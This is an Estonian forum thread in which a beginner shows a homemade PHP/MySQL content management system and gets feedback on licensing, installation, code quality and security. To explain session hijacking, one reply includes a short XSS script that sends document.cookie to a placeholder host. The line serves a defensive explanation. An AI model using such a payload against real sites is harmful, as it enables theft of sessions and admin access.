Avaleht
uus teema   vasta Tarkvara »  WWW »  SGM CMS (arvamus ja veaotsingud) märgi kõik teemad loetuks
märgi mitteloetuks
vaata eelmist teemat :: vaata järgmist teemat
mine lehele 1, 2, 3  järgmine
Hinnavaatlus :: Foorum :: Uudised :: Ärifoorumid :: HV F1 ennustusvõistlus :: Pangalink :: Telekavad :: HV toote otsing
autor
sõnum Saada viide sõbrale. Teata moderaatorile
otsing:  
SGM
HV kasutaja

liitunud: 04.12.2005




sõnum 14.08.2008 21:04:09 SGM CMS (arvamus ja veaotsingud) vasta tsitaadiga

Ma loodan, et seda teemat ei võeta reklaamina, sest see pole nii mõeldud.

Vahelduseks pusisin kokku sisuhaldustarkvara (CMS), et harjutada php-d ja panna ennast proovile. Ei teinud seda kokku mingitest hotscripts'i koodijuppidest või muust teiste poolt tehtud scriptidest. Ise tegin ikka algusest lõpuni, php+mysql. Välja arvatud javascriptid, mille võtsin mujalt, netist (vabavara).

Nüüd siis oleks soov seda näidata targematele, et keegi ehk viitsib seda proovida, häkkida, et vigu leida või isegi kasutada. icon_biggrin.gif
Objektiivsed arvamused ja kasulikud nõuanded on ka väga teretulnud, aga mõttetu möla ja niisama põhjuseta kritiseerimine ei ole oodatud.

http://sgm.pri.ee/cms

Sealt saab scripti ka alla laadida, et installida. icon_smile.gif
Meeldetuletuseks: tegemist on beta-versiooniga, pealegi see on kõige esimene ja ainus CMS, mille teinud olen, ja esimene katse ka, aia taha visatud versioone õnneks pole.

EDIT:
Tundub, et Netpointi tasuta konto peal ei hakka tagasiside-vormi lehel captcha tööle - kuvab vaid musta kasti, aga peab kuvama heledat kasti ja koodi selle peal.
Kommentaarid: 4 loe/lisa Kasutajad arvavad:  :: 1 :: 1 :: 0
tagasi üles
vaata kasutaja infot saada privaatsõnum
JannoT
HV kasutaja
JannoT

liitunud: 23.12.2005




sõnum 14.08.2008 21:31:54 Re: SGM CMS (arvamus ja veaotsingud) vasta tsitaadiga

SGM kirjutas:

EDIT:
Tundub, et Netpointi tasuta konto peal ei hakka tagasiside-vormi lehel captcha tööle - kuvab vaid musta kasti, aga peab kuvama heledat kasti ja koodi selle peal.

Netpoindis on vajalik php moodul puudu.

_________________
011010000110100101101110011011100110000101110110011000010110000101110100011011000111010101110011
Kommentaarid: 5 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 5
tagasi üles
vaata kasutaja infot saada privaatsõnum
Aq
HV kasutaja

liitunud: 01.01.2003




sõnum 14.08.2008 22:14:40 vasta tsitaadiga

Nuujah... kas Sinu enda leht lippab selle peal? Ei ole endale veel paigaldanud, aga... võiks mõelda ka teema peale, mis viimasel ajal Eestissegi jõudmas, nagu näitab kasvõi siinse foorumi mõned teemad: SEO - Otsingumootoritele optimeerimine icon_wink.gif
Kommentaarid: 3 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 3
tagasi üles
vaata kasutaja infot saada privaatsõnum mine selle kasutaja kodulehele
SGM
HV kasutaja

liitunud: 04.12.2005




sõnum 14.08.2008 22:31:32 vasta tsitaadiga

jep, see sisuhalduse koduleht jookseb ka puhtalt selle tarkvara peal. icon_smile.gif

Noh ma ikka mingil määral olen seda SEO asja seal arvestanud, aga siiski tegemise käigus seda, mis parajasti meelde tuli. Spetsiaalselt ei ole uurinud õpetusmaterjale. Seal on pealkiri, meta jms. kõik seadetest muudetav (ei ole staatiliselt HTML-i sees) ja sellega annab päris palju mängida võtmesõnadega. Eelkõige pealkiri, sest meta võtmesõnad pole enam eriti tõhus asi tänapäeval.

Üks oluline asi siiski jäi mul pooleli - mod_rewrite tugi. See on hetkel tühi. Saab seadetest valida, aga tulemus on endine. See aitaks päris hästi SEO juures kaasa, kui aadress pole ?id=123&id2=456 vaid on /pealkiri/alampealkiri icon_smile.gif See mod_rewrite'iga mängimine on juba eri teema, mida ma veel eriti ei valda. icon_biggrin.gif
Kommentaarid: 4 loe/lisa Kasutajad arvavad:  :: 1 :: 1 :: 0
tagasi üles
vaata kasutaja infot saada privaatsõnum
nene
Kreisi kasutaja
nene

liitunud: 20.03.2004




sõnum 15.08.2008 09:36:47 vasta tsitaadiga

Räägiks litsentsitingimustest, sest CMS-i kodulehel pole selle kohta just kuigivõrd palju öeldud.

LICENCE.txt failis on sul järgmised nõuded:
tsitaat:
SGM CMS'i on lubatud tasuta kasutada juhul, kui jätate puutumata lehe alaservas oleva viite tarkvara looja lehele. Kui soovite seda eemaldada, siis selleks oleks vaja annetada natuke raha. Võtke ühendust tarkvara autoriga: http://sgm.pri.ee/cms või stgmax ( at ) gmail . com

Selle märgistuse omavoliline eemaldamine on litsentsitingimuste rikkumine ja muudab teie käes oleva koopia sellest tarkvarast kohe piraattarkvaraks!


Kuid samas sisaldab su tarkvara ka GPL all levitatavat PHP navigatorit. GPL litsents aga ütleb nii:

tsitaat:
b) You must cause any work that you distribute or publish, that in
whole or in part contains or is derived from the Program or any
part thereof, to be licensed as a whole at no charge to all third
parties under the terms of this License.


Seega hetkel rikud sa oma litsentsiga GPL-i tingimusi.

Lisaks komplitseerib kasutustingimusi veel see, et kasutatav Highslide JS on tasuta vaid personaalseks kasutamiseks.

Ja lõpuks pole su enda kirjutatud litsentsitingimused kuigivõrd läbimõeldud. Ma loen sealt välja, et võin selle tarkvaraga teha absoluutselt kõike senikaua, kuni jätan alles viite SGM CMS-i kodulehele. Seega võiks ma põhimõtteliselt kirjutada 99% sellest tarkvarast täiesti ümber ja peaksin ikkagi selle viite alles jätma - ei tundu just eriti mõnus perspektiiv.

Millegipärast on paljudel noortel programmeerijatel ülemäära hea arvamus oma tarkvarast, mistõttu seda on kohe tarvis võimalikult rangete litsentside all levitada, kuigi on nii palju märksa paremat ja täiesti vaba tarkvara. Millest küll see tuleb, ma ei mõista...
Kommentaarid: 24 loe/lisa Kasutajad arvavad:  :: 0 :: 1 :: 23
tagasi üles
vaata kasutaja infot saada privaatsõnum mine selle kasutaja kodulehele
SGM
HV kasutaja

liitunud: 04.12.2005




sõnum 15.08.2008 13:18:56 vasta tsitaadiga

nii, hea info. Litsents ongi seal see külg, mis on veel läbi mõtlemata. Ei taha seadusega pahuksisse minna, seega tahaks kõik litsentsi-teemad selgelt korda teha. icon_rolleyes.gif Ka sellekohased nõuanded on teretulnud.
HS kohta ma märkisin seal ka, et "Highslide, litsents: erakasutuseks tasuta", kuid selles on nene'l õigus, et kui seda sisuhaldust kasutada tasuliselt või kommerts-eesmärgil, siis muutub ka HS litsentsitingimus tasuliseks...
PHP navigatori võin eemaldada ka, kuna see nagunii mõnes serveris korralikult ei tööta, näiteks Netpoint'i tasuta serveris see mul jukerdas, localhostis töötas kenasti.

nene kirjutas:
Millegipärast on paljudel noortel programmeerijatel ülemäära hea arvamus oma tarkvarast, mistõttu seda on kohe tarvis võimalikult rangete litsentside all levitada, kuigi on nii palju märksa paremat ja täiesti vaba tarkvara. Millest küll see tuleb, ma ei mõista...

Kui sa ise midagi valmis teed ja selle üle uhke oled, et "hakkama sain!", kas siis pole hea arvamus oma loodu üle? icon_biggrin.gif Ma usun, et enamusel on nii. Vähemalt alguses esimeste saavutustega. Sõber soovitas kohe kolme käega, et "tee sisuhaldus!", kuna olemasolevad talle ei meeldi. Ma ise pole ka leidnud midagi head, peale Joomla muidugi. Hotscripts pakub ka CMS-ide scripte, aga seni olen sealt leidnud midagi sellist, mis vähemalt mind ei rahulda (enamasti: liiga keeruline, arusaamatu, liiga lihtne, kole vms.)
OT: kui nooreks sa nt. mind pead? (huvipärast küsin) icon_biggrin.gif
Kommentaarid: 4 loe/lisa Kasutajad arvavad:  :: 1 :: 1 :: 0
tagasi üles
vaata kasutaja infot saada privaatsõnum
mikk36
HV Guru
mikk36

liitunud: 21.02.2004




sõnum 15.08.2008 14:21:25 vasta tsitaadiga

SGM, noor mis mõõdustikus ?
füüsiline vanus või programmeerijana ?

nene mõtles kindlalt vanust programmeerijana
Kommentaarid: 85 loe/lisa Kasutajad arvavad:  :: 0 :: 2 :: 78
tagasi üles
vaata kasutaja infot saada privaatsõnum
SGM
HV kasutaja

liitunud: 04.12.2005




sõnum 15.08.2008 14:56:06 vasta tsitaadiga

mikk36 kirjutas:
SGM, noor mis mõõdustikus ?
füüsiline vanus või programmeerijana ?

nene mõtles kindlalt vanust programmeerijana

Selles suhtes õigus, progemiskogemusi on umbes 15 kuud. Kujundamisega alustasin juba 2005. kevadel.

EDIT:
Ühes USA serveris töötab captcha kenasti: http://sgmcms.ratepic.net/?com=1
aga server ise on äärmiselt saast - hostexcellence.com - kellelegi ei soovitaks!
Kommentaarid: 4 loe/lisa Kasutajad arvavad:  :: 1 :: 1 :: 0
tagasi üles
vaata kasutaja infot saada privaatsõnum
robiii
HV vaatleja

liitunud: 19.06.2008




sõnum 15.08.2008 17:59:05 vasta tsitaadiga

Vabandust , kuid mul tekkis probleeme . Kasutan planet.ee -d . MySql on tellitud !

$database_name = "xxx";
$database_username = "xxx";
$database_password = "xxx";
$database_host_server = "localhost";

$database_table_prefix = "xxx"; //xxx_) Ära muuda pärast installi! Do not edit after install!

$siteURL = "http://www.xxx.planet.ee/xxx"; // ilma kaldkriipsuta lõpus! No trailing slash!

Kas sa saaksid täpsemalt kirjeldada , mis ma sinna peaks kirjutama ( $database_table_prefix = "xxx"; ) ja ( $siteURL = "http://www.xxx.planet.ee/xxx"; )

Mina tegin enda mõistuse järgi , avasin install.php ja viskas ette :

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, apache-admins@zone.ee and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.
Apache/2.0.61/DataZone SP 2.0 (Unix) Server at ******.planet.ee Port 80
tagasi üles
vaata kasutaja infot saada privaatsõnum
SGM
HV kasutaja

liitunud: 04.12.2005




sõnum 15.08.2008 21:35:29 vasta tsitaadiga

robiii kirjutas:
Vabandust , kuid mul tekkis probleeme . Kasutan planet.ee -d . MySql on tellitud !

Kas sa saaksid täpsemalt kirjeldada , mis ma sinna peaks kirjutama ( $database_table_prefix = "xxx"; ) ja ( $siteURL = "http://www.xxx.planet.ee/xxx"; )


$siteURL on see aadress, mis on saidi põhiaadress. Näiteks nagu http://www.neti.ee on neti.ee URL ja ei midagi enamat. icon_smile.gif
$sitePath on pandud? Kui ei, siis õige peaksid leidma oma hostingu paneelist või phpinfo(); käsu abil ja tulemusest otsi DOCUMENT_ROOT.
$database_table_prefix jäta "sgm_", sest seda ei pea muutma. See on ettenähtud selleks, kui soovid mitu erinevat saiti installida samasse andmebaasi. Siis prefix eristab erinevaid saite samas andmebaasis. icon_smile.gif

Ise olen selle CMS-i kenasti tõrgeteta käima saanud localhostis, Netpointis, Hostexcellence'is. Rohkem pole veel proovinud. Netpointi tasuta konto aga ei kuva captcha pilti, seega seadetest saab selle eemaldada.

EDIT:
Internal Server Error tuleneb pahatihti ka .htaccess faili sisust - vahel mõni server ei luba teatud käske kasutada või üldse mitte midagi. Siis pane selles failis kõikide ridade ette #-märk. icon_smile.gif
Kommentaarid: 4 loe/lisa Kasutajad arvavad:  :: 1 :: 1 :: 0
tagasi üles
vaata kasutaja infot saada privaatsõnum
linnumees
HV kasutaja

liitunud: 15.06.2005




sõnum 15.08.2008 22:58:31 vasta tsitaadiga

SGM kirjutas:
Üks oluline asi siiski jäi mul pooleli - mod_rewrite tugi. See on hetkel tühi. Saab seadetest valida, aga tulemus on endine. See aitaks päris hästi SEO juures kaasa, kui aadress pole ?id=123&id2=456 vaid on /pealkiri/alampealkiri icon_smile.gif See mod_rewrite'iga mängimine on juba eri teema, mida ma veel eriti ei valda. icon_biggrin.gif

$_SERVER['PATH_INFO']


MySQLi? mysqli_real_escape_string()? exit() peale header()'iga suunamist? Normaalne sessioonihaldus (sh IP kontrollimine)? Funktsioonid äkki eraldi faili, mitte kuhugi suvalisse kohta? Rea if'ide asemel sama muutuja võrdlemisel oleks ilusam kasutada elseif'i? Indeksitest oled midagi kuulnud? Installifaili puhul oleks ilus kontrollida, kas leht on juba installitud või vastupidi? VALID_SITE väärtuseks 384 - milleks sihuke number, booleanist ju täitsa piisaks? Keelemuutujad oleks ilus (ja kiirem) panna massiivi? Templatemootorina sobiks ka paremini Smarty, kuna see on tunduvalt võimekam jne? Failid on ISO kodeeringus, leht aga väidab end olevat UTFis? Misasi on <br style="font-family: Verdana;">? Jne.

SGM kirjutas:
Ma usun, et enamusel on nii. Vähemalt alguses esimeste saavutustega. Sõber soovitas kohe kolme käega, et "tee sisuhaldus!", kuna olemasolevad talle ei meeldi. Ma ise pole ka leidnud midagi head, peale Joomla muidugi.

TYPO3?
Kommentaarid: 3 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 3
tagasi üles
vaata kasutaja infot saada privaatsõnum mine selle kasutaja kodulehele
SGM
HV kasutaja

liitunud: 04.12.2005




sõnum 16.08.2008 08:46:13 vasta tsitaadiga

linnumees kirjutas:
Misasi on <br style="font-family: Verdana;">?

Kus selline asi on? Koodis küll mitte. See võibolla esineb sisus, mis on editori genereeritud HTML-iga? icon_rolleyes.gif

SQL injection-i jaoks olen pannud addslashes vahele kõigisse andmebaasi minevatesse muutujatesse. mysql_real_escape_string on nii pikk, et ei ole sisse harjunud mulle. icon_biggrin.gif

linnumees kirjutas:
Normaalne sessioonihaldus (sh IP kontrollimine)?

IP on näha admin-lehel, aga milleks seda kontrollida sessiooniga seoses? Et korraga saaks sisse logida vaid 1 isik? Seal pole kasutajaid, seal on vaid admin-sissepääs, mida võib jagada mitme haldaja vahel...

linnumees kirjutas:
Funktsioonid äkki eraldi faili, mitte kuhugi suvalisse kohta?

Enamus funktsioone (peaaegu kõik vist) asuvad failis top.php, mitte suvalises kohas laiali. Aga see on küll mõeldav, et paneks kõik ühte eraldi faili. thumbs_up.gif

linnumees kirjutas:
Rea if'ide asemel sama muutuja võrdlemisel oleks ilusam kasutada elseif'i?

Vahel kasutan, aga vahel tundub "mugavam" if-itamine icon_biggrin.gif Tunde järgi. Ega seal mingit performance'i vahet pole ju?

linnumees kirjutas:
Indeksitest oled midagi kuulnud?

MySQL? Seal polegi eriti vajadust selleks (vaid paaris kohas on olemas), sest keerulisemaid ja suuremahulisi (väga paljudest ridadest) päringuid pole. Kui ma ikka õigesti aru sain sellest? icon_rolleyes.gif

linnumees kirjutas:
Installifaili puhul oleks ilus kontrollida, kas leht on juba installitud või vastupidi? VALID_SITE väärtuseks 384 - milleks sihuke number, booleanist ju täitsa piisaks? Keelemuutujad oleks ilus (ja kiirem) panna massiivi?

See installi-värk on endalgi teada ja saab tehtud. icon_wink.gif 384 meeldis mulle (tobe eks?), paistis koodis paremini silma, muidu enne oli 1 seal. icon_biggrin.gif

linnumees kirjutas:
Templatemootorina sobiks ka paremini Smarty, kuna see on tunduvalt võimekam jne?

No vähemalt esimeses versioonis püüdsin kõik teha ISE, vältida muude osade kasutamist (välja arvatud javascript muidugi). Kas see Smarty mitte poleks sobivam sellisele lehele, kus on keerulisem template+sisu ja suuremad mahud laadida?

linnumees kirjutas:
Failid on ISO kodeeringus, leht aga väidab end olevat UTFis?

Probleem. Kui panen lehe kodeeringu ISO peale, hakkavad osad täpitähed "pulli tegema" :S ja üleval päise kohal (renderdatud lähtekoodis enne <!DOCTYPE...> tagi!) on imelikud märgid. :S

TYPO3 on valmis sisuhaldus, aga siin ei ole korraliku sisuhalduse otsimise vaid konkreetse isetehtud tarkvara teema, tema head ja vead jne. icon_smile.gif

Tundub, et ikka parandamist ja tuunimist veel jagub selle CMSi juures.
Kommentaarid: 4 loe/lisa Kasutajad arvavad:  :: 1 :: 1 :: 0
tagasi üles
vaata kasutaja infot saada privaatsõnum
linnumees
HV kasutaja

liitunud: 15.06.2005




sõnum 16.08.2008 09:30:50 vasta tsitaadiga

SGM kirjutas:
linnumees kirjutas:
Misasi on <br style="font-family: Verdana;">?

Kus selline asi on? Koodis küll mitte. See võibolla esineb sisus, mis on editori genereeritud HTML-iga? icon_rolleyes.gif

Ilmselt jah, aga see osa peaks ka ikkagi korralik olema. icon_razz.gif

SGM kirjutas:
SQL injection-i jaoks olen pannud addslashes vahele kõigisse andmebaasi minevatesse muutujatesse. mysql_real_escape_string on nii pikk, et ei ole sisse harjunud mulle. icon_biggrin.gif

Aga keegi ei keela teha mõnda lühema nimega funktsiooni selleks otstarbeks või näiteks laiendades MySQLi classi, kui sa seda toredat vidinat kunagi kasutama peaks hakkama. :p

SGM kirjutas:
IP on näha admin-lehel, aga milleks seda kontrollida sessiooniga seoses? Et korraga saaks sisse logida vaid 1 isik? Seal pole kasutajaid, seal on vaid admin-sissepääs, mida võib jagada mitme haldaja vahel...

Esiteks on X-Forwarded-For header, mida sul olemasolul kasutatakse, vabalt muudetav. Teiseks, kui ma saan mingit pidi kätte su sessiooniküpsise, piisab mul selle serverile saatmisest, et adminile ligi pääseda...

SGM kirjutas:
linnumees kirjutas:
Rea if'ide asemel sama muutuja võrdlemisel oleks ilusam kasutada elseif'i?

Vahel kasutan, aga vahel tundub "mugavam" if-itamine icon_biggrin.gif Tunde järgi. Ega seal mingit performance'i vahet pole ju?

Kui suur see vahe on, ma ei oska öelda, aga asi näeb lihtsalt ilusam ja loetavam välja.

SGM kirjutas:
linnumees kirjutas:
Indeksitest oled midagi kuulnud?

MySQL? Seal polegi eriti vajadust selleks (vaid paaris kohas on olemas), sest keerulisemaid ja suuremahulisi (väga paljudest ridadest) päringuid pole. Kui ma ikka õigesti aru sain sellest? icon_rolleyes.gif

Nii palju, kui mina olen katsetanud, on vahe siiski ka väikeste tabelite puhul olemas. See, tõsi küll, avaldus üle saja päringu puhul sekundis, aga siiski.

SGM kirjutas:
linnumees kirjutas:
Templatemootorina sobiks ka paremini Smarty, kuna see on tunduvalt võimekam jne?

No vähemalt esimeses versioonis püüdsin kõik teha ISE, vältida muude osade kasutamist (välja arvatud javascript muidugi). Kas see Smarty mitte poleks sobivam sellisele lehele, kus on keerulisem template+sisu ja suuremad mahud laadida?

Jajah, mulle meeldis ka kunagi kõike ise teha. Aga mingil hetkel jõudis kohale, et pole mõtet iga päev jalgratast uuesti leiutada ning üldine tulemus on olulisem, kui see, kas kõik on ise tehtud või ei. Seda enam, et mõnda asja ei oska või jõua normaalse aja jooksul ise teha.

SGM kirjutas:
linnumees kirjutas:
Failid on ISO kodeeringus, leht aga väidab end olevat UTFis?

Probleem. Kui panen lehe kodeeringu ISO peale, hakkavad osad täpitähed "pulli tegema" :S ja üleval päise kohal (renderdatud lähtekoodis enne <!DOCTYPE...> tagi!) on imelikud märgid. :S

Salvesta failid UTFi.

SGM kirjutas:
TYPO3 on valmis sisuhaldus, aga siin ei ole korraliku sisuhalduse otsimise vaid konkreetse isetehtud tarkvara teema, tema head ja vead jne. icon_smile.gif

SGM kirjutas:
...Ma ise pole ka leidnud midagi head, peale Joomla muidugi.
Kommentaarid: 3 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 3
tagasi üles
vaata kasutaja infot saada privaatsõnum mine selle kasutaja kodulehele
SGM
HV kasutaja

liitunud: 04.12.2005




sõnum 16.08.2008 11:41:58 vasta tsitaadiga

linnumees kirjutas:
SGM kirjutas:
IP on näha admin-lehel, aga milleks seda kontrollida sessiooniga seoses? Et korraga saaks sisse logida vaid 1 isik? Seal pole kasutajaid, seal on vaid admin-sissepääs, mida võib jagada mitme haldaja vahel...

Esiteks on X-Forwarded-For header, mida sul olemasolul kasutatakse, vabalt muudetav. Teiseks, kui ma saan mingit pidi kätte su sessiooniküpsise, piisab mul selle serverile saatmisest, et adminile ligi pääseda...

Kas siis piisab "REMOTE_ADDR"-ist?
Kuidas selle küpsise peaks keegi kõrvaline isik kätte saama? Ja kuidas seda vältida siis saaks? icon_rolleyes.gif
Kommentaarid: 4 loe/lisa Kasutajad arvavad:  :: 1 :: 1 :: 0
tagasi üles
vaata kasutaja infot saada privaatsõnum
linnumees
HV kasutaja

liitunud: 15.06.2005




sõnum 16.08.2008 12:13:54 vasta tsitaadiga

SGM kirjutas:
Kas siis piisab "REMOTE_ADDR"-ist?

Sellest saad sa kätte IP, kust otsene ühendus tuleb, jah. Proxy kasutamisel selle IP. Sel juhul X-Forwarded-For headeris on tegeliku kasutaja aadress, võib sisaldada ka mitut (komaga eraldatult). Kontrollid mõlemat. Mina olen siiani kontrollinud ka useragentit. :p

SGM kirjutas:
Kuidas selle küpsise peaks keegi kõrvaline isik kätte saama? Ja kuidas seda vältida siis saaks? icon_rolleyes.gif

No esiteks peaks olema krüptimata ühendus pealtkuulatav.. Teiseks on võimalik see näiteks proxyst kätte saada.. Kolmas võimalus on läbi XSSi, näiteks:
<script type="text/javascript">
self.location.href='http://midaiganes.ee/?c='+document.cookie;
</script>


Tõsi küll, nii väikese asja puhul ei ole võib-olla sellel mõtet, aga kui asi valmis, ei näe mingit põhjust, miks ei võiks kasutada. :p php.net'ist leiad kindlasti näiteid, kuidas asja teha, nt siit.
Kommentaarid: 3 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 3
tagasi üles
vaata kasutaja infot saada privaatsõnum mine selle kasutaja kodulehele
dezine
HV vaatleja
dezine

liitunud: 04.06.2007




sõnum 21.08.2008 13:12:30 vasta tsitaadiga

Kuna mul tuleb luua ja hallata ka väiksemaid veebisaite,siis tunnen huvi igasuguste lihtsate ja vabavaraliste CMSide vastu,sest ausaltöeldes staatiliste html lehtede loomine on juba tõesti eilne päev ja parajalt kohmakas.
Seetõttu katsetasin ka sinu loodud mootorit.Minu tähelepanekud ja soovitused sellel teemal:
Positiivne pool:
+ Meeldiv on näha,et tekstieditor töötab ka Operas.
+ Koodi kuvamine lisaks on-line editimisele on hea abiline.
+ Seadistamise alt piltide ja galerii mudimine on mugav (võrreldes nt. Tiger cms'iga,kus tuleb galerii php koodi ise ehitada)

Mida võiks veel arendada:
* Menüü on vist hetkel vaid ülevalt alla süsteemiga, mille paigutust saab lehel määrata. Selle muutmiseks tundub mulle, et tuleb vist menu.php'd ise mudida?
Võrdluseks jällegi Tiger cms,kus menüü paigutust ja "jooksmist" saab html koodiga võrdlemisi lihtsalt muuta.
*Menüü linki ei saa luua ilma, et tema külge lingitaks juba eelnevalt loodud lehte. Mina soovitaks sinna juurde arendada valiku,et ta tekitab ise alamlehe sama nimega, nagu menüüpunkt luuakse.(lihtsalt,veidi mugavam kasutamine)

Mulle isiklikult tunduvad need salvestamise ja katkestamise disk ja X liiga suured,aga see on tõesti maitse asi icon_smile.gif

Kokkuvõtlikult:
Tundub täiesti kasutatav asjapulk olema,lähtudest senisest katsetamisest oma testversioonis.
Üritan seda kuskil ka reaalse vahendina katsetada, eks siis ole veel paremini näha, mida ta suudab.
Muud hetkel ei oskagi enam öelda, kui et jõudu asja arendamisel(loodetavasti jätkad sellega tööd) ja ootame uusi uudiseid icon_smile.gif
Kommentaarid: 3 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 3
tagasi üles
vaata kasutaja infot saada privaatsõnum mine selle kasutaja kodulehele
SGM
HV kasutaja

liitunud: 04.12.2005




sõnum 21.08.2008 13:25:39 vasta tsitaadiga

Tänan sisuka ja hea jutu eest! icon_smile.gif

dezine kirjutas:
Mida võiks veel arendada:
* Menüü on vist hetkel vaid ülevalt alla süsteemiga, mille paigutust saab lehel määrata. Selle muutmiseks tundub mulle, et tuleb vist menu.php'd ise mudida?
Võrdluseks jällegi Tiger cms,kus menüü paigutust ja "jooksmist" saab html koodiga võrdlemisi lihtsalt muuta.
*Menüü linki ei saa luua ilma, et tema külge lingitaks juba eelnevalt loodud lehte. Mina soovitaks sinna juurde arendada valiku,et ta tekitab ise alamlehe sama nimega, nagu menüüpunkt luuakse.(lihtsalt,veidi mugavam kasutamine)

Ma nägin ühel lehel, et keegi oli ka horisontaalseks need saanud, aga aadressi hetkel peast ei mäleta kahjuks. Horisontaalseks saab menüü muidu CSS-i abil, aga pole välistatud, et vaja on lisada menu.php-sse mõned <div>-id selle saavutamiseks juurde. icon_rolleyes.gif Igatahes see menüü on <ul> ja <li> põhjal tehtud, seega peaks saama selle (nagu ka Joomlas) kenasti horisontaali ajada. icon_smile.gif

See alamlehe loomine on ka hea mõte. icon_razz.gif
Aga menüü-linki saab luua ka ilma leheta, kuid siis URL-i peale, mitte sisu jaoks.
Kommentaarid: 4 loe/lisa Kasutajad arvavad:  :: 1 :: 1 :: 0
tagasi üles
vaata kasutaja infot saada privaatsõnum
mikk36
HV Guru
mikk36

liitunud: 21.02.2004




sõnum 21.08.2008 13:29:58 vasta tsitaadiga

dezine kirjutas:
+ Meeldiv on näha,et tekstieditor töötab ka Operas.
see oli pelgalt opera enda viga et ta varem ei töötanud, tõenäoliselt kasutad uut 9.5 versiooni
Kommentaarid: 85 loe/lisa Kasutajad arvavad:  :: 0 :: 2 :: 78
tagasi üles
vaata kasutaja infot saada privaatsõnum
dezine
HV vaatleja
dezine

liitunud: 04.06.2007




sõnum 21.08.2008 13:39:14 vasta tsitaadiga

Ma kujutan ette,et näiteks menüüle horisontaalse või vertikaalse valiku juurde progemine poleks vist kah väga keeruline? Lihtsalt kaks eri templiiti ja olekski useril vaid valiku küsimus, kumba pidi menüü on.
See urli peale link on tõesti hea valikuvõimalus.

edit:

(9.26 versioon on. 9.5 oli ära rikutud,niiet peale paaripäevast kasutust kiskusin ta maha, liiga jube oli..)
jah, eks selle brauseriga vast on kah tööd tehtud, aga nende editoridega on müstilisi kalasid kah omajagu.
Kommentaarid: 3 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 3
tagasi üles
vaata kasutaja infot saada privaatsõnum mine selle kasutaja kodulehele
SGM
HV kasutaja

liitunud: 04.12.2005




sõnum 21.08.2008 13:42:53 vasta tsitaadiga

Midagi annab selle menüü-stiili valikuga ehk välja nuputada, järgmise versiooni jaoks näiteks.

dezine kirjutas:
jah, eks selle brauseriga vast on kah tööd tehtud, aga nende editoridega on müstilisi kalasid kah omajagu.

Olen korduvalt sattunud mingites CMS-ides ja scriptides selliste editoride peale, mis üldse ei tööta. Parimal juhul tuleb kast ette, nuppudega, aga ei saa kirjutada. IE-ga vahest toimiks, aga IE-d ei taha mitte kasutada. Siis leidsin kunagi sellise editori, mis toimib kenasti. Laeb kiirelt samuti. Muidu oleksin pannud TinyMCE sinna, seal rohkem võimalusi, aga see laeb ennast sisse palju kauem.
Kommentaarid: 4 loe/lisa Kasutajad arvavad:  :: 1 :: 1 :: 0
tagasi üles
vaata kasutaja infot saada privaatsõnum
mikk36
HV Guru
mikk36

liitunud: 21.02.2004




sõnum 21.08.2008 13:51:33 vasta tsitaadiga

ei hakka alla laadima aga ehk mainid ära et mis editor kasutusel on ?
Kommentaarid: 85 loe/lisa Kasutajad arvavad:  :: 0 :: 2 :: 78
tagasi üles
vaata kasutaja infot saada privaatsõnum
SGM
HV kasutaja

liitunud: 04.12.2005




sõnum 21.08.2008 14:01:18 vasta tsitaadiga

openwysiwyg
Kommentaarid: 4 loe/lisa Kasutajad arvavad:  :: 1 :: 1 :: 0
tagasi üles
vaata kasutaja infot saada privaatsõnum
muidumeez
HV vaatleja
muidumeez

liitunud: 27.08.2005




sõnum 25.08.2008 23:03:34 vasta tsitaadiga

Kui vaadata seda PHP programmikoodi poole pealt, siis, tsiteerides klassikuid, on seda jama üpris keeruline kommenteerida. Kui see on tõesti Su esimene CMS, siis las ta olla, näpuharjutuseks kõlbab, aga ei enamat. Sellise stiili ja kodeerimismeetodiga on seda süsteemi arendada suhtkoht keeruline kui mitte öelda võimatu. Mõtlesin, et panen vead kirja, aga neid on liiga palju ja kellaaeg liiga hiline, et sellega tegelda. Kui huvi on, siis võin privas seletada.
Kommentaarid: 1 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 1
tagasi üles
vaata kasutaja infot saada privaatsõnum
okpoiss
HV kasutaja
okpoiss

liitunud: 07.11.2001




sõnum 29.08.2008 10:25:12 vasta tsitaadiga

Päris huvitav Eesti toode ja kindlasti kiitus pealehakkamisele. Ise olen ka ühte CMS-i arendanud ja arendan siiamaani. Esmamuljel on tegemist "just another cms" lahendusega, kus pole midagi uut. Tekib küsimus, et miks peaks Sinu CMSi valima, peale selle, et see on Sinu tehtud? Kahjuks ei ole ma seda endal käima pand, kuid vaadates pilte jääb selline mulje.

Mulle endale meeldivad CMS-id, kus enamus haldamisest käbi nn realajas ja veebilehe enda keskkonnas. Märksõnadeks drag'n'drop, ajax, web2.0 jne. Sellisel juhul sa reaalselt näed mida teed ja saad sobivaid infotükikesi ise sobivasse kohta paigutada. Aga et saada paremat pilti vaadake seda demo videot: http://www.cmsbox.com/?_k=UCheioAG. Minu meelest üks parima UI-ga CMS, mida näinud olen. Auhinnad räägivad juba enda eest. aga edu ja ideid edasi pürgimiseks.
Kommentaarid: 6 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 6
tagasi üles
vaata kasutaja infot saada privaatsõnum
SGM
HV kasutaja

liitunud: 04.12.2005




sõnum 29.08.2008 14:23:55 vasta tsitaadiga

Tänud!icon_smile.gif
okpoiss kirjutas:
Tekib küsimus, et miks peaks Sinu CMSi valima, peale selle, et see on Sinu tehtud? Kahjuks ei ole ma seda endal käima pand, kuid vaadates pilte jääb selline mulje.

Põhjuseid, miks tegin, on vist 2: tahtsin proovida, kas suudan hakkama saada (ühtlasi õppisin palju uut juurde ja ka selle teemaga siin olen uut õppinud, tänud ka kasutajale muidumeez, kes mind õigele rööpale lähemale põrutas.); teiseks: üks sõber ka ajas peale, et tee CMS. icon_biggrin.gif
Midagi uudset seal tõesti pole. Tegin kõik tunde järgi, midagi kõrvale ei pannud, et kopeerida maha. Need suured ikoonid (diskett ja cancel) on vahest Joomla mõjutustega, kuna toda olen päris palju kasutanud varem.
okpoiss kirjutas:
